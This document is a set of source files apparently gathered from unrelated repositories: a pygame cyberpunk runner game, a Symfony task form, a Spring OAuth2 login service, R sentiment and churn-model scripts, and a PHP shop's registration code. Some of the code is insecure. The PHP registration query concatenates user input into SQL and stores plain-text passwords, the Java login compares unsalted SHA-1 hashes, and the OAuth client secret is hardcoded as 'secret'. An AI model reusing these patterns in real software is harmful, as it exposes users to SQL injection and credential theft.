self.currentAction.update()
# verifica inputs
self.input.checkForInput()
# atualiza a imagem atual da Viper
self.image = self.currentAction.image
        # update Viper's collision mask (important because her
        # contact area can change depending on her current action)
self.mask = pygame.mask.from_surface(self.image)
def run(self):
# muda a animação atual para "correndo" se ela nao estiver no ar
if not self.inAir:
self.currentAction = self.actions.run
def jump(self):
# muda a animação atual para "pulando" se ela nao estiver no ar
# evita que ela de dois saltos no ar
if not self.inAir:
self.currentAction = self.actions.jump
self.speedy = -15
def crouch(self):
# muda a animação atual para "abaixada" se ela nao estiver no ar
if not self.inAir:
self.currentAction = self.actions.crouch<file_sep>/Input.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Input.py
#
# @brief Arquivo da classe Input
# @section Descrição
# Essa classe é responsável por verificar todos comandos acionados pelo jogador.
import pygame
from pygame.locals import *
import sys
class Input:
def __init__(self, entity):
        # the main player entity, used to trigger its
        # animation and action management methods.
self.entity = entity
def checkForInput(self):
        # this method checks keyboard events and whether the game was quit or restarted
events = pygame.event.get()
self.checkForKeyboardInput()
self.checkForQuitAndRestartInputEvents(events)
def checkForKeyboardInput(self):
        # check which keys are pressed
        pressedKeys = pygame.key.get_pressed()
        # crouch
        if (pressedKeys[K_DOWN] or pressedKeys[K_s]) and not pressedKeys[K_SPACE]:
            self.entity.crouch()
        # jump
        elif pressedKeys[K_SPACE] and not pressedKeys[K_DOWN]:
            self.entity.jump()
        # run (the game's default action)
        else:
            self.entity.run()
def checkForQuitAndRestartInputEvents(self, events):
        # check whether the game window was closed
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
<file_sep>/Game.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Game.py
#
# @brief Arquivo principal do jogo CyberPY
#
# @section Descrição
# O objetivo do jogo é alcançar o máximo de pontos possíveis.
# O jogador controla a personagem Viper que pode abaixar e pular
# equanto segue correndo e desviando dos veículos para continuar viva.
import pygame
from random import randrange
# Class containing the Viper character's controls and information
from Player import Player
# Drone class
from Drone import Drone
# Red vehicle class
from RedVehicle import RedVehicle
# Yellow vehicle class
from YellowVehicle import YellowVehicle
# Class that controls the background
from Ground import Ground
# Constants used in the game, such as speed, height etc.
from Configs import *
# pygame initialization
pygame.init()
# loading the font for the score
font = pygame.font.SysFont("monospace", 16)
GREEN = (0,255,0)
# setting up the background music
pygame.mixer.music.load("./sounds/cyberpunk-street.ogg")
# play(-1) keeps the music looping forever
pygame.mixer.music.play(-1)
# configuring the game window
screen = pygame.display.set_mode(SCREEN_SIZE)
# the game has three background layers
# each layer scrolls at a lower speed to give the impression of movement
bg_1_group = pygame.sprite.Group()
bg_2_group = pygame.sprite.Group()
bg_3_group = pygame.sprite.Group()
for i in range(2):
    # each background image is loaded and added to a sprite group
    # they are added twice
bg_1 = Ground("./layers/bg-1.png", BG_1_SPEED, i * SCREEN_WIDTH)
bg_1_group.add(bg_1)
bg_2 = Ground("./layers/bg-2.png", BG_2_SPEED, i * SCREEN_WIDTH)
bg_2_group.add(bg_2)
bg_3 = Ground("./layers/bg-3.png", BG_3_SPEED, i * SCREEN_WIDTH)
bg_3_group.add(bg_3)
# instancia da personagem Viper
player = Player()
player_group = pygame.sprite.Group(player)
# o primeiro veículo é o vermelho
redVehicle = RedVehicle()
# enemy_group é o grupo de inimigos que podem colidir com a Viper
enemy_group = pygame.sprite.Group(redVehicle)
# clock do jogo
clock = pygame.time.Clock()
# essa função verifica se um sprite saiu da tela
def shouldKillSprite(sprite):
return sprite.rect[0] < -(sprite.rect[2])
score = 0
while True:
    # when a background leaves the screen, we remove it and add a new one at the end
    # this way the buildings in the background never stop appearing
if shouldKillSprite(bg_1_group.sprites()[0]):
bg_1_group.remove(bg_1_group.sprites()[0])
new_ground = Ground("./layers/bg-1.png", BG_1_SPEED, SCREEN_WIDTH)
bg_1_group.add(new_ground)
if shouldKillSprite(bg_2_group.sprites()[0]):
bg_2_group.remove(bg_2_group.sprites()[0])
new_ground = Ground("./layers/bg-2.png", BG_2_SPEED, SCREEN_WIDTH)
bg_2_group.add(new_ground)
if shouldKillSprite(bg_3_group.sprites()[0]):
bg_3_group.remove(bg_3_group.sprites()[0])
new_ground = Ground("./layers/bg-3.png", BG_3_SPEED, SCREEN_WIDTH - (FPS/BG_3_SPEED))
bg_3_group.add(new_ground)
# se não houver inimigos na tela iremos adicionar um de forma aleatória
if len(enemy_group.sprites()) == 0 or shouldKillSprite(enemy_group.sprites()[0]):
if len(enemy_group.sprites()) > 0:
enemy_group.remove(enemy_group.sprites()[0])
# vamos usar um alcance de 0 a 30
x = randrange(31)
# para x entre 0 e 10 adicionaremos o veiculo vermelho
if x <= 10 :
newEnemy = RedVehicle()
# para x entre 10 e 20 adicionaremos o veiculo amarelo
elif x <= 20:
newEnemy = YellowVehicle()
# acima de 20 teremos um drone na tela
else:
newEnemy = Drone()
enemy_group.add(newEnemy)
# atualizamos os backgrounds, player e inimigos
bg_1_group.update()
bg_2_group.update()
bg_3_group.update()
player_group.update()
enemy_group.update()
# desenhando todas as entidades na tela
bg_1_group.draw(screen)
bg_2_group.draw(screen)
bg_3_group.draw(screen)
player_group.draw(screen)
enemy_group.draw(screen)
# atualização do score
scoretext = font.render(f"Score {score}", 1, GREEN)
screen.blit(scoretext, (5, 10))
score += 1
# atualizando a tela
pygame.display.update()
clock.tick(FPS)
# aqui é verificada se houve colisão entre dois grupos de sprites
if pygame.sprite.groupcollide(player_group, enemy_group, False, False, pygame.sprite.collide_mask):
# se colidirem o score volta a zero
enemy_group.remove(enemy_group.sprites()[0])
score = 0<file_sep>/YellowVehicle.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file YellowVehicle.py
#
# @brief Arquivo da classe do inimigo veículo amarelo
from Enemy import Enemy
class YellowVehicle(Enemy):
"""
    This class extends the Enemy class and simply invokes the
    constructor with its default attributes; it mainly exists to make
    instantiating a new object easier.
"""
def __init__(self):
super().__init__(
path = "./vehicles/v-yellow.png",
speed = 8,
xpos = 20,
ypos = 80,
width = 80,
height = 80
)<file_sep>/Configs.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Configs.py
#
# @brief Arquivo com constantes usadas
SCREEN_WIDTH = 600
SCREEN_HEIGHT = 400
PLAYER_WIDTH = 100
PLAYER_HEIGHT = 120
PLAYER_SIZE = (PLAYER_WIDTH, PLAYER_HEIGHT)
SCREEN_SIZE = (SCREEN_WIDTH, SCREEN_HEIGHT)
FLOOR = SCREEN_HEIGHT - PLAYER_HEIGHT - 10
VEHICLE_SPEED = 10
BG_1_SPEED = 1
BG_2_SPEED = 2
BG_3_SPEED = 3
FPS = 60<file_sep>/Actions.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Actions.py
#
# @brief Arquivo da classe de ações da personagem Viper
import pygame
from os import listdir
from Animation import Animation
from Configs import PLAYER_SIZE
class Actions:
def __init__(self):
# basicamente todos as animações são carregadas
self.run = Animation(self.loadSprites("./player/run/"))
self.jump = Animation(self.loadSprites("./player/jump/"))
self.crouch = Animation(self.loadSprites("./player/crouch/"))
self.hurt = Animation(self.loadSprites("./player/hurt/"))
def loadSprites(self, path):
# carrega as imagens em um diretório especifico
files = listdir(path)
images = [pygame.image.load(path + file).convert_alpha() for file in files]
images = [pygame.transform.scale(image, PLAYER_SIZE) for image in images]
return images<file_sep>/Drone.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Drone.py
#
# @brief Arquivo da classe do inimigo Drone
from Enemy import Enemy
class Drone(Enemy):
"""
    This class extends the Enemy class and simply invokes the
    constructor with its default attributes; it mainly exists to make
    instantiating a new object easier.
"""
def __init__(self):
super().__init__(
path = "./drone/drone.png",
speed = 10,
xpos = 20,
ypos = 10,
width = 80,
height = 80
)<file_sep>/RedVehicle.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file RedVehicle.py
#
# @brief Arquivo da classe do inimigo veículo vermelho
from Enemy import Enemy
class RedVehicle(Enemy):
"""
    This class extends the Enemy class and simply invokes the
    constructor with its default attributes; it mainly exists to make
    instantiating a new object easier.
"""
def __init__(self):
super().__init__(
path = "./vehicles/v-red.png",
speed = 7,
xpos = 20,
ypos = 80,
width = 150,
height = 120
)<file_sep>/README.md
# CyberPY!
This is a game where you must dodge the vehicles and stay alive
# Installation
To install the game and run it on your machine you will need Python 3 and pip installed.
Download the pygame library through pip
```bash
pip install pygame
```
Now just run the Game.py file
<file_sep>/Enemy.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Enemy.py
#
# @brief Arquivo da classe Enemy
import pygame
from Configs import SCREEN_WIDTH, SCREEN_HEIGHT
class Enemy(pygame.sprite.Sprite):
def __init__(self, path, speed, xpos, ypos, width, height):
super(Enemy, self).__init__()
        # this is the vehicle image; pygame's convert_alpha() keeps the per-pixel
        # transparency around the image, so the mask built from it follows the
        # outline of the vehicle rather than a rectangular block.
self.image = pygame.image.load(path).convert_alpha()
self.image = pygame.transform.scale(self.image, (width, height))
        # a mask is built on top of the vehicle's PNG image, where every pixel
        # of the vehicle is used to detect collisions.
self.mask = pygame.mask.from_surface(self.image)
        # rect is an attribute of pygame's Sprite class used to keep track of the
        # object's position on the screen and its size.
self.rect = self.image.get_rect()
self.rect[0] = SCREEN_WIDTH + width + xpos
self.rect[1] = SCREEN_HEIGHT - height - ypos
# Velocidade do inimigo
self.speed = speed
def update(self):
"""
        This method updates the vehicle's horizontal position (which makes it move towards the player).
"""
self.rect[0] -= self.speed
<file_sep>/Ground.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Ground.py
#
# @brief Arquivo da classe Ground
# @section Descrição
# Essa classe é responsável por movimentar cada um dos três backgrounds.
import pygame
from Configs import SCREEN_WIDTH, SCREEN_HEIGHT
class Ground(pygame.sprite.Sprite):
def __init__(self, path, speed, xpos = 0):
pygame.sprite.Sprite.__init__(self)
# velocidade que ele se move
self.speed = speed
# imagem
self.image = pygame.image.load(path).convert_alpha()
self.image = pygame.transform.scale(self.image, (SCREEN_WIDTH, SCREEN_HEIGHT))
        # rect is an attribute of pygame's Sprite class that stores
        # a reference to the sprite's position on the screen and its size.
self.rect = self.image.get_rect()
self.rect[0] = xpos
self.rect[1] = 0
def update(self):
# movimenta o fundo para trás (assim a Viper parece ir pra frente)
self.rect[0] -= self.speed<file_sep>/Animation.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Animation.py
#
# @brief Arquivo da classe de animações do jogo CyberPY
class Animation:
def __init__(self, images, deltaTime=8):
# imagens para a animação
self.images = images
# tempo que uma animação leva para ser completada
self.timer = 0
self.index = 0
# imagem atual da animação
self.image = self.images[self.index]
self.deltaTime = deltaTime
def update(self):
# metodo de atualização onde a imagem atual é passado para a próxima
self.timer += 1
if self.timer % self.deltaTime == 0:
if self.index < len(self.images) - 1:
self.index += 1
else:
self.index = 0
self.image = self.images[self.index]
|
d78a2ca4813272ae325b3e152810714d1bb33f6b
|
[
"Markdown",
"Python"
] | 12
|
Python
|
FelipeDSR/CyberPY
|
cd6ef85bdcd4a579806fd28ad3e1f79a268977bb
|
18be80fe89ec946888f8b0c79c2fba5bfd3e91c9
|
refs/heads/master
|
<file_sep>package com.itesm.oauth.conf;
import com.itesm.oauth.service.AuthProvider;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.oauth2.config.annotation.configurers.ClientDetailsServiceConfigurer;
import org.springframework.security.oauth2.config.annotation.web.configuration.AuthorizationServerConfigurerAdapter;
import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
import org.springframework.security.oauth2.config.annotation.web.configurers.AuthorizationServerEndpointsConfigurer;
/**
 * Configuration for OAuth2.
*
* @author mklfarha
*
*/
@Configuration
@EnableAuthorizationServer
public class OAuth2Config extends AuthorizationServerConfigurerAdapter {
private static final Logger logger = LoggerFactory.getLogger(OAuth2Config.class);
@Autowired
private AuthProvider authenticationProvider;
@Autowired
private AuthenticationManager authenticationManager;
@Value("${itesm.oauth.tokenTimeout:-1}")
private int expiration;
@Override
public void configure(AuthorizationServerEndpointsConfigurer configurer) throws Exception {
configurer.authenticationManager(authenticationManager)
.approvalStoreDisabled();
}
@Override
public void configure(ClientDetailsServiceConfigurer clients) throws Exception {
clients.inMemory()
.withClient("demo")
.secret("secret")
.accessTokenValiditySeconds(expiration)
.scopes("read", "write")
.authorizedGrantTypes("authorization_code", "password", "refresh_token", "client_credentials", "implicit")
.resourceIds("service");
}
@Autowired
public void configure(AuthenticationManagerBuilder auth) throws Exception {
logger.debug("configurando provider");
auth.authenticationProvider(authenticationProvider);
}
}
<file_sep>package com.itesm.oauth.service;
import org.apache.commons.codec.digest.DigestUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.security.authentication.AuthenticationProvider;
import org.springframework.security.authentication.BadCredentialsException;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.AuthenticationException;
import org.springframework.stereotype.Service;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import java.util.ArrayList;
import java.util.Map;
/**
*
* @author mklfarha
* AuthProvider for Oauth2
*/
@Service
public class AuthProvider implements AuthenticationProvider {
@Autowired
private JdbcTemplate template;
static final Logger logger = LoggerFactory.getLogger(AuthProvider.class);
@Override
public Authentication authenticate(Authentication authentication) throws AuthenticationException {
final String username = (String)authentication.getPrincipal();
final String password = (String)authentication.getCredentials();
if (isValidEmailAddress(username)) {
            // queryForMap() throws EmptyResultDataAccessException when no row matches,
            // so a missing user is handled via the exception rather than a null check.
            Map<String,Object> user;
            try {
                user = template.queryForMap("Select * from usuario where email = ? limit 1", username);
            } catch (org.springframework.dao.EmptyResultDataAccessException e) {
                throw new BadCredentialsException("Persona no encontrada con el nombre usuario/correo: " + username);
            }
if (!user.get("contrasena").equals(DigestUtils.sha1Hex(password))) {
throw new BadCredentialsException("Identificación Incorrecta");
}
user.put("contrasena",null);
return new UsernamePasswordAuthenticationToken(user, null, new ArrayList<>() );
} else {
throw new BadCredentialsException("Correo con formato incorrecto: " + username);
}
}
public static boolean isValidEmailAddress(String email) {
boolean result = true;
try {
InternetAddress emailAddr = new InternetAddress(email);
emailAddr.validate();
} catch (AddressException ex) {
result = false;
}
return result;
}
@Override
public boolean supports(Class<?> type) {
logger.debug("supports class: {}", type);
return type.equals(UsernamePasswordAuthenticationToken.class);
}
}
<file_sep>server.port=8081
spring.datasource.url=jdbc:mysql://localhost/mydb?useSSL=false
spring.datasource.username=root
spring.datasource.password=
spring.datasource.driver-class-name=com.mysql.jdbc.Driver
logging.level.org.springframework.security=DEBUG
|
8fe6d1b299a0f9a9714273c2fac603476a770283
|
[
"Java",
"INI"
] | 3
|
Java
|
PabloEnriquez/drop-fixOauth
|
196f25b2fdfeb5522984b33b5974bcf0a986efc8
|
d6f0f65e124be779c2218f650eefd10ff59780d3
|
refs/heads/master
|
<file_sep>########################Importing libraries##################################
#install.packages("xgboost")
library(lattice)
library(Matrix)
library(xgboost)
library(caret)
library(dplyr)
library(Hmisc)
library(reshape)
library(magrittr)
#install.packages("tm")
#install.packages("tidytext")
library(twitteR)
library(tm)
library(tidyr)
library(tidytext)
#############################Importing data##################################
#tweet_data<-read.csv("tweets.csv")
#install.packages("rtweet")
library(rtweet)
rt <- search_tweets("#facebook lang:en", n = 18000, include_rts = TRUE, parse = TRUE, type = "mixed")
names(rt)
tweets_data <- rt %>%
select(user_id,text, screen_name, created_at)
# Tokenize
tidy_tweets <- tweets_data %>%
unnest_tokens(word, text)
library(dplyr)
# # Clean
# cleantidytweets <- anti_join(tidy_tweets,get_stopwords())
cleantidytweets<-dplyr::anti_join(tidy_tweets, tidytext::get_stopwords())
str(cleantidytweets)
cleantidytweets$n_char<-nchar(cleantidytweets$word)
cleantidytweets_filtered<-cleantidytweets %>%
filter(n_char>2)
cleantidytweets_filtered_2 <-cleantidytweets_filtered %>%
filter(word !="http") %>%
filter(word !="https") %>%
filter(word !="facebook") %>%
filter(word !="amp") %>%
filter(word !="t.co")
word_count<-count(cleantidytweets_filtered_2, word, sort = TRUE)
word_count$word <- reorder(word_count$word, word_count$n)
word_count_sample <- head(word_count, 20)
ggplot2::ggplot(word_count_sample, ggplot2::aes(x = word, y = n)) +
ggplot2::geom_col() +
ggplot2::coord_flip() +
ggpubr::theme_pubclean()
######## Q1. Which words are most commonly used in the dataset?#############
# May, Social, People, Soviet, community are commonly used words
######## Q2. Word Cloud Fact ###############################################
#install.packages("wordcloud")
library(wordcloud)
wordcloud::wordcloud(word_count$word, word_count$n, min.freq = 1, max.words = 100, random.order=FALSE)
#####
######Wordcloud clearly indicates that the tweets are associated with WW2 Victory day
######## Q3. Tf-idf ######################################################
word_tf.count <- dplyr::count(cleantidytweets, user_id, word, sort = TRUE)
word_count_tfidf<-word_tf.count
word_count_tfidf$word<-as.character(word_count_tfidf$word)
word_count_tfidf <- word_count_tfidf[which(word_count_tfidf$n > 5 &
word_count_tfidf$word != "facebook" &
nchar(word_count_tfidf$word) > 5),]
head(word_count_tfidf)
tidytext::bind_tf_idf(word_count_tfidf,user_id, word, n)
#########
wordcloud::wordcloud(word_count_tfidf$word, word_count_tfidf$n, min.freq = 1, max.words = 1000, random.order=FALSE)
#########Q4. Join Sentiment and Viz sentiment#######################
#install.packages("textdata")
library(textdata)
fb_df.sen <- dplyr::inner_join(cleantidytweets, tidytext::get_sentiments("nrc"), by = "word")
fb_df.sen <- dplyr::inner_join(fb_df.sen, tidytext::get_sentiments("afinn"), by = "word")
head(fb_df.sen, 10)
fb_df.sen_count <- count(fb_df.sen, sentiment, word, sort = TRUE)
fb_df.sen_count$word <- reorder(fb_df.sen_count$word, fb_df.sen_count$n)
fb_df.sen_count <- by(fb_df.sen_count, fb_df.sen_count["sentiment"], head, n=5)
fb_df.sen_count <- Reduce(rbind, fb_df.sen_count)
ggplot2::ggplot(fb_df.sen_count, ggplot2::aes(x = word, y = n, fill = sentiment)) +
ggplot2::geom_col(show.legend = FALSE) +
ggplot2::facet_wrap(~sentiment, scales = "free") +
ggplot2::labs(y = "Contribution to sentiment", x = NULL) +
ggplot2::coord_flip() +
ggpubr::theme_pubclean()
######## The most common sentiments are fear, sadness, anger
######## Q5. Are the posts about facebook rather positive, or rather#####
# negative? (note: feel free to apply a simple mean)
fb_df.sen_response<-fb_df.sen_count %>%
group_by(sentiment) %>%
summarise(response=sum(n))
####### The posts about facebook are positive
<file_sep>library(MASS)
library(dplyr)
library(caret)
library(pROC)
getwd()
data <- read.csv("data for problem B.csv", header = T)
sum(is.na(data))
Num_Var <- scale(data[,c(3,6,9,14)])
data[,c(3,6,9,14)] <- NULL
str(data)
data_appended <- cbind(data, Num_Var)
str(data_appended)
# No missing values in entire dataset
# Test/Train split
train <- data_appended[1:700,]
test <- data_appended[701:1000,]
length(train$checkingstatus1)
str(train)
# LOGISTIC REGRESSION
model <- glm(train$Default ~ ., family = binomial,
data = train) %>%
stepAIC(trace = FALSE)
model_nonAIC <- glm(train$Default ~ ., family = binomial,
data = train)
model_nonAIC$aic-model$aic
# AIC reduced by 13.50033
variables <- as.data.frame(list(model$coefficients))
variable_nonaic <- as.data.frame((list(model_nonAIC$coefficients)))
nrow(variable_nonaic)-nrow(variables)
# To summarize, the AIC "optimised" model has higher fit
prob <- model %>% predict(test, type="response")
prob
test$Default
ROC_Curve<- roc(test$Default, prob, plot=TRUE, legacy.axes=TRUE ,out = FALSE)
plot(ROC_Curve, print.thres="best", col="#377eb8", lwd=4, print.auc=TRUE)
# Logistic Regression proves to be a good model with AUC: 0.775
Prob <- as.data.frame(prob)
Classification <- ifelse(prob > 0.068,1,0)
Classification <- as.factor(Classification)
Test_ref <- as.factor(test$Default)
ConfX <- confusionMatrix(Classification, reference = Test_ref, positive = '1')
ConfX
# Random Forest
library(randomForest)
Model_RM <- randomForest(factor(train$Default) ~ ., data= train)
Model_RM$votes[,1]
Model_RM2 <- randomForest(train$Default ~ ., mtry = 2 ,data= train, importance=TRUE)
Model_RM2
pred_RM <- predict(Model_RM, test, type= "prob")
pred_RM
ROC_RF<- roc(test$Default, pred_RM[,1], percent = T, col="#4daf4a", lwd=4)
plot(ROC_RF, print.thres="best", col="#4daf4a", lwd=4, print.auc=TRUE)
# We see that using Random Forest only decreases the AUC marginally. We go from 0.775 using
# Logistic Regression to 0.773 using Random Forest. Because both are equally easy to interpret,
# and they are more or less computationally equal (at least on a dataset of this size),
# I would choose Logistic Regression as my model.
<file_sep>data <- read.csv("kkbox(1).csv", sep =",")
library(tidyverse)
library(ggpubr)
#train/test split
data1 = sort(sample(nrow(data), nrow(data)*.7))
train <- data[data1,]
test <- data[-data1,]
#Task 1
theme_set(theme_pubr())
head(train,4)
ggplot(train, aes(x = city , y= is_churn )) + geom_point() + stat_smooth()
input <- "is_churn ~ age + gender + payment_plan_days + plan_list_price + actual_amount_paid + n_transactions + is_cancel"
glm(formula = input, family = binomial(link ="logit"), data = train)
install.packages("margins")
library("margins")
# fit on the training split only so the held-out test set stays unseen
x <- glm(input, family = binomial(link = 'logit'), data = train)
m<- margins(x)
summary(m)
glm(formula = is_churn ~ n_transactions + is_cancel, family = binomial (link = "logit"), data = train)
fitted.results <- predict(x, test, type='response')
fitted.results <- ifelse(fitted.results > 0.1,1,0)
misClasificError <- mean(fitted.results != test$is_churn)
print(1-misClasificError)
#Task 2 clasification tree
install.packages("rpart")
library("rpart")
kkboxtree <- rpart(input, train, method ="class")
printcp(kkboxtree)
my_prediction <- predict(kkboxtree, test, type="class")
tree_error <- mean(my_prediction != test$is_churn)
print(1-tree_error)
|
4aaac512c5b6424b41de2409c8d3fdf39542bfb7
|
[
"R"
] | 3
|
R
|
anim10/ESCP-and-side-projects
|
50037d45b4c8f67256bfcd4a91ddb3dff9df4585
|
0ecffbe7990877437d5cebb6e886953371efcf0b
|
refs/heads/master
|
<repo_name>nripeshtrivedi/Symfony_project<file_sep>/app/cache/dev/twig/3b/35/0b5f56cbcfe19719aaf02a4719e5247f52c441491f475542a09bdc00ba6b.php
<?php
/* AcmeTaskBundle:Default:new.html.twig */
class __TwigTemplate_3b350b5f56cbcfe19719aaf02a4719e5247f52c441491f475542a09bdc00ba6b extends Twig_Template
{
public function __construct(Twig_Environment $env)
{
parent::__construct($env);
$this->parent = false;
$this->blocks = array(
);
}
protected function doDisplay(array $context, array $blocks = array())
{
// line 1
echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
\t <style type=\"text/css\">
\t\t#mydiv
\t\t{
\t\t\tposition:absolute;
\t\t\ttop: 50%;
\t\t\tleft: 50%;
\t\t\twidth:30em;
\t\t\theight:6em;
\t\t\tmargin-top: -9em; /*set to a negative number 1/2 of your height*/
\t\t\tmargin-left: -15em; /*set to a negative number 1/2 of your width*/
\t\t\tborder: 1px solid #ccc;
\t\t\tbackground-color: #f3f3f3;
\t\t}
\t</style>
<title>All Records</title>
</head>
<body>
\t\t<div id=\"mydiv\">
\t\t\t";
// line 23
echo $this->env->getExtension('form')->renderer->renderBlock((isset($context["form"]) ? $context["form"] : $this->getContext($context, "form")), 'form');
echo "
\t\t\t\t<ol id=\"task\">
\t\t\t\t\t";
// line 25
$context['_parent'] = (array) $context;
$context['_seq'] = twig_ensure_traversable((isset($context["task"]) ? $context["task"] : $this->getContext($context, "task")));
foreach ($context['_seq'] as $context["_key"] => $context["item"]) {
// line 26
echo "\t\t\t\t\t\t<li>";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["item"]) ? $context["item"] : $this->getContext($context, "item")), "task"), "html", null, true);
echo "</li>
\t\t\t\t\t\t";
// line 27
echo twig_escape_filter($this->env, twig_date_format_filter($this->env, $this->getAttribute((isset($context["item"]) ? $context["item"] : $this->getContext($context, "item")), "dueDate"), "Y-m-d"), "html", null, true);
echo "
\t\t\t\t\t";
}
$_parent = $context['_parent'];
unset($context['_seq'], $context['_iterated'], $context['_key'], $context['item'], $context['_parent'], $context['loop']);
$context = array_intersect_key($context, $_parent) + $_parent;
// line 29
echo "\t\t\t\t</ol>
\t\t</mydiv>
</body>
</html>";
}
public function getTemplateName()
{
return "AcmeTaskBundle:Default:new.html.twig";
}
public function isTraitable()
{
return false;
}
public function getDebugInfo()
{
return array ( 65 => 29, 57 => 27, 52 => 26, 48 => 25, 43 => 23, 19 => 1,);
}
}
<file_sep>/src/Acme/TaskBundle/Controller/DefaultController.php
<?php
namespace Acme\TaskBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Acme\TaskBundle\Entity\Task;
use Symfony\Component\HttpFoundation\Request;
use Acme\TaskBundle\Form\Type\TaskType;
class DefaultController extends Controller
{
public function newAction(Request $request)
{
// create a task
$task = new Task();
$task->setTask('Write a task');
$task->setDueDate(new \DateTime('tomorrow'));
$form = $this->createForm(new TaskType(), $task);
$em = $this->getDoctrine()->getManager();
$form->handleRequest($request);
if ($form->isValid())
{
$task = $form->getData();
$em->persist($task);
$em->flush();
}
$repository = $this->getDoctrine()
->getRepository('AcmeTaskBundle:Task');
$tasks = $repository->findAll();
return $this->render('AcmeTaskBundle:Default:new.html.twig', array(
'form' => $form->createView(),'task'=>$tasks,
));
}
}
|
15c4fef4f56e85b2351f1d0e5f2c5b04e1bb9357
|
[
"PHP"
] | 2
|
PHP
|
nripeshtrivedi/Symfony_project
|
2938edec57e788a2c2e1fbca3655e2d0b927626c
|
903c60ce5a2cbfde7871e8da83f36f938bb04b4f
|
refs/heads/master
|
<repo_name>Icybrew/Parduotuve<file_sep>/models/registerModel.php
<?php
class registerModel extends Model {
function __construct() {
parent::__construct();
}
function isUsernameUnique($username) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE username = '" . $username . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return FALSE;
} else {
return TRUE;
}
} else {
return mysqli_error($this->db);
}
}
function register($username, $email, $password) {
$register_result = mysqli_query($this->db, "INSERT INTO users (username, email, password) VALUES ('" . $username . "', '" . $email . "', '" . $password . "')");
if ($register_result) {
return TRUE;
} else {
return mysqli_error($this->db);
}
}
}
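// --- Editor's sketch (illustrative only, not wired into this class) ---
// The project TODO lists "add password hashing"; a minimal way to do it with PHP's
// built-in password API is sketched below. The helper names hashPassword() and
// verifyPassword() are hypothetical and are not used anywhere else in this codebase.
function hashPassword($plain) {
    // password_hash() generates a random salt and uses the current default algorithm (bcrypt)
    return password_hash($plain, PASSWORD_DEFAULT);
}
function verifyPassword($plain, $storedHash) {
    // password_verify() re-hashes $plain using the salt embedded in $storedHash
    return password_verify($plain, $storedHash);
}
// Possible usage: store hashPassword($password) in users.password at registration time,
// and have loginModel select the row by username only, then check
// verifyPassword($password, $row['password']) instead of matching the plain-text
// value inside the SQL query.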
<file_sep>/views/product/index.php
<div class="row m-0">
<aside class="col-xl-3 col-lg-12 col-md-12 col-sm-12 border-left border-right mb-1">
<?php include_once 'views/menu_categories.php'; ?>
</aside>
<pre>
<?php //var_dump($this->data['product']); ?>
</pre>
<?php if(isset($this->data['product']) && count($this->data['product']) > 0) { ?>
<div class="col-xl-9 col-lg-12 col-md-12 col-sm-12 row p-0 mx-auto my-3 d-flex">
<div class="position-relative col-xl-6 col-lg-12 col-md-12 col-sm-12">
<img src="/parduotuve/img/<?php echo isset($this->data['product']["image"]) ? ('products/' . $this->data['product']["image"]) : 'no-image.png'; ?>" class="img-fluid rounded mx-auto d-block" alt="<?php echo $this->data['product']["name"]; ?>" title="<?php echo $this->data['product']["name"]; ?>">
<?php if ($this->data['product']['is_new']) { ?>
<div class="new">New</div>
<?php } ?>
<?php if ($this->data['product']['is_recommended']) { ?>
<p class="recommended">Recommended</p>
<?php } ?>
</div>
<div class="col-xl-6 col-lg-10 col-md-10 col-sm-11 mx-auto">
<div class="my-5">
<h1 class="m-0"><?php echo $this->data['product']["name"]; ?></h1>
<p class="text-muted"><small>Product code: <?php echo $this->data['product']["code"]; ?></small></p>
<h2 class="text-primary">$ <?php echo $this->data['product']["price"]; ?></h2>
<div>
<form action="/parduotuve/cart" method="post" class="row">
<button type="button" class="btn btn-light mr-1 col-1">-</button>
<input type="number" class="form-control col-2" name="amount" value="1" min="0" max="10" placeholder="amount">
<button type="button" class="btn btn-light ml-1 col-1">+</button>
<button type="submit" class="btn btn-primary col-3 mx-1" name="cart_add" value="<?php echo $this->data['product']["id"]; ?>">Add to cart</button>
</form>
<div class="my-2"><span class="font-weight-bold">Stock: </span><?php echo $this->data['product']["availability"]; ?></div>
<div class="my-2"><span class="font-weight-bold">Brand: </span><?php echo $this->data['product']["brand"]; ?></div>
</div>
</div>
</div>
<div class="col-12 mt-5">
<h4>Product description:</h4>
<p class="font-weight-light"><?php echo $this->data['product']["description"]; ?></p>
</div>
</div>
<?php } else { ?>
<div class="mx-auto my-5 text-center">
<h1 class="font-weight-bold">Product not found</h1>
<a href="/parduotuve/catalog/" class="d-inline-block mt-3"><button type="button" class="btn btn-lg btn-primary border">Go back</button></a>
</div>
<?php } ?>
</div><file_sep>/controllers/blog.php
<?php
class Blog extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
case 'view_post':
$this->view_post($args);
break;
case 'post':
$this->post($args);
break;
default:
